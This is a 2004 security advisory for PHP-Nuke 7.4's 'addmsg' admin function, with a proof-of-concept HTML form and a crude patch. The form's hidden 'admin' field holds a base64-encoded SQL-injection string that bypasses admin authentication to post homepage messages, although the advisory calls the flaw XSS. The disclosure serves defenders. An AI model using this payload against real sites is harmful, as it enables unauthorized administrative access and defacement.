[XSS] PHP-Nuke 7.4 AddMsg Bug

Type securityvulns
Reporter Securityvulns
Modified 2004-09-08T00:00:00


  • CODEBUG Labs
  • Advisory #4
  • Title: Addmsg Bug
  • Author: Pierquinto 'Mantra' Manco
  • Product: PHP-Nuke 7.4
  • Type: XSS
  • Web: http://www.mantralab.org *

                  Add Message Bug
  • ) Description PHP-Nuke is a very bugged web CMS, version 7.4 has critical XSS bug that permit to an attacker to post gloabal home-page messages. We can bypass the official php-nuke patch sending data by POST instead of GET.

  • ) Proof-of-Concept Create a HTML file with this lines:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php"> <p>TITLE: <input type="text" name="add_title"> <br> CONTENT: <textarea name="add_content" rows=10 cols=50></textarea> <br> DATE: <input type="text" name="add_mdate"> <br> E-MAIL: <input type="text" name="add_expire"> <br> <input type="hidden" name="add_expire" value="0"> <br> <input type="hidden" name="add_active" value="1"> <br> <input type="hidden" name="add_view" value="1"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="addmsg"> </p> <p> <input type="submit" name="Submit" value="Post this message"> <br> </p> </form>

  • ) Patch

Apply this code to your admin.php file:

if ( !empty($HTTP_GET_VARS['admin']) ) { die("Shit! Mantra wins =)"); }

if ( !empty($HTTP_POST_VARS['admin']) ) { die("Shit! Mantra wins =)"); }

-) Note Previous patch isn't enough performant. Try this one. There are a lot of this problem in PHP-Nuke 7.4, my patch will check the content of $_POST[admin] and $_GET[admin]. I'm going to post all this vulnerabilities on my site... http://www.mantralab.org